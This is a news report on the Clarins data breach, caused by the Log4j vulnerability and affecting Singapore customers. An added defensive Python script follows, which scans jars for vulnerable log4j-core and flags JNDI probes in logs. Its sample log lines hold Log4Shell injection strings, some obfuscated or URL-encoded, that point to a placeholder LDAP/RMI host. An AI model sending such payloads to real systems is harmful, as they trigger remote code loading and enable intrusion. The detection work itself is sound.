Cosmetics company Clarins hit by data security incident, 'may involve' Singapore customers’ personal information
SINGAPORE: French cosmetics company Clarins has been hit by a data security incident which "may involve" Singapore customers’ personal information, it said on Tuesday (Jan 11).
The company said in a statement on its website that the incident was due to a critical vulnerability in a widely used piece of software known as Log4j.
Log4j, an open-source library that provides activity logging for many Java-based applications, was in use on the system managing Clarins' database of Singapore customers' personal data. Clarins became aware of the security breach when a staff member could not access the database.
“Unfortunately, while this vulnerability affecting our database was promptly patched within hours of release of the security patch, it appears that the server has been compromised after the vulnerability was publicly exposed,” it said.
The data accessed may have included customers’ personal information such as name, address, email, phone number and Clarins loyalty programme status, it added.
Based on its "investigations to-date", the data did not include any password, credit card or payment information as the server accessed “did not include such information”, said Clarins.
Minister for Communications and Information Josephine Teo said last month that Singapore authorities are checking and patching government systems "thoroughly" to guard against the Log4j vulnerability.
In its statement, Clarins said it deeply regrets the incident, adding that it has “promptly” implemented security patches to prevent a recurrence of such an attack.
The company added that it is "working closely" with legal and security experts to ensure that the incident is properly addressed. It has also notified the Singapore Personal Data Protection Commission (PDPC) of the breach, and the PDPC said it is investigating the incident.
Responding to CNA's queries, Clarins said: "An investigation is currently underway in conjunction with the authorities following the notifications we made."
Clarins also advised customers to change their passwords and to treat all unsolicited calls, emails and SMS messages with caution, particularly those asking for payment details or passwords.
In a reply to CNA's queries, the Cyber Security Agency (CSA) urged organisations and product developers to implement mitigation measures to protect their systems and networks.
Organisations with products that use Log4j should patch to the latest updates immediately and determine whether the software is also present in other parts of their systems, CSA said.
They should also continue "active monitoring of their systems for anomalous activity", deploy protective network monitoring and review system logs.
Organisations can refer to SingCERT’s advisory for more details.
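The two CSA recommendations above, finding every copy of Log4j in a system (including copies bundled inside application jars) and reviewing logs for signs of exploitation attempts, can both be started with a small script. The following Python is an added example written for this page; it is not code from Clarins, CSA or SingCERT. It assumes the Log4j JNDI lookup class and Maven metadata paths shipped in log4j-core jars, uses a version threshold of 2.17.1 as an assumed cut-off that should be confirmed against the vendor advisory for your Java version, and runs against a constructed in-memory "fat jar" and constructed access-log lines rather than real files. The log check goes beyond the plain `${jndi:` string and unwraps the nested-lookup and URL-encoded obfuscations commonly used to evade naive matching.

```python
import io
import re
import zipfile
from typing import Dict, List, Tuple
from urllib.parse import unquote

# Class whose presence means the JNDI lookup code path is shipped in the jar.
JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
# Maven metadata carried by log4j-core jars, used to read the version string.
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
# Assumed threshold (editor's assumption): anything below is reported for review.
MIN_REVIEWED_VERSION = (2, 17, 1)


def parse_version(text: str) -> Tuple[int, ...]:
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 0), so pre-releases sort low."""
    nums = [int(n) for n in re.findall(r"\d+", text.split("-")[0])]
    return tuple((nums + [0, 0, 0])[:3])


def scan_jar_bytes(data: bytes, path: str) -> List[Dict]:
    """Inspect a jar and, recursively, any jar/war/ear nested inside it."""
    findings: List[Dict] = []
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    names = set(zf.namelist())
    if JNDI_LOOKUP_CLASS in names:
        version = "unknown"
        if POM_PROPS in names:
            for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        needs_review = version == "unknown" or parse_version(version) < MIN_REVIEWED_VERSION
        findings.append({"path": path, "version": version, "needs_review": needs_review})
    for name in sorted(names):
        if name.lower().endswith((".jar", ".war", ".ear")):
            findings.extend(scan_jar_bytes(zf.read(name), f"{path}!/{name}"))
    return findings


def build_sample_fat_jar(version: str = "2.14.1") -> bytes:
    """Constructed sample: an app jar bundling a fake log4j-core jar (not a real artifact)."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as zf:
        zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # placeholder, not a real class
        zf.writestr(POM_PROPS, f"version={version}\nartifactId=log4j-core\n")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as zf:
        zf.writestr("com/example/App.class", b"\xca\xfe\xba\xbe")
        zf.writestr(f"BOOT-INF/lib/log4j-core-{version}.jar", inner.getvalue())
    return outer.getvalue()


# Obfuscation unwrapping: ${lower:J} -> j, ${upper:n} -> N, ${env:X:-j} / ${::-j} -> j.
_LOWER = re.compile(r"\$\{lower:([^${}]*)\}", re.IGNORECASE)
_UPPER = re.compile(r"\$\{upper:([^${}]*)\}", re.IGNORECASE)
_DEFAULT = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")


def normalize_lookup_text(text: str) -> str:
    """URL-decode and collapse nested lookups from the inside out until stable."""
    prev = None
    while prev != text:
        prev = text
        text = unquote(text)
        text = _LOWER.sub(lambda m: m.group(1).lower(), text)
        text = _UPPER.sub(lambda m: m.group(1).upper(), text)
        text = _DEFAULT.sub(lambda m: m.group(1), text)
    return text


def is_jndi_probe(line: str) -> bool:
    """True if the line contains a JNDI lookup after de-obfuscation."""
    return "${jndi:" in normalize_lookup_text(line).lower()


def flag_jndi_probes(lines: List[str]) -> List[int]:
    """Indices of log lines that carry a JNDI lookup attempt."""
    return [i for i, line in enumerate(lines) if is_jndi_probe(line)]


# Constructed access-log lines (not real traffic); example.invalid is a reserved name.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [12/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Dec/2021:03:14:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - [12/Dec/2021:03:14:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:ldap://example.invalid/b}"',
    '10.0.0.9 - - [12/Dec/2021:03:14:12 +0000] "GET /?x=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2Fexample.invalid%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
]

if __name__ == "__main__":
    for f in scan_jar_bytes(build_sample_fat_jar(), "app.jar"):
        print(f)
    print("suspicious log lines:", flag_jndi_probes(SAMPLE_LOG_LINES))
```

On a real host the jar scanner would be pointed at every `.jar`, `.war` and `.ear` under the application and container directories, since log4j-core is frequently bundled inside Spring Boot or application-server archives rather than installed separately. The log check is a triage aid: a flagged line shows an attempt, and whether the attempt succeeded has to be established from outbound connection logs and the host itself.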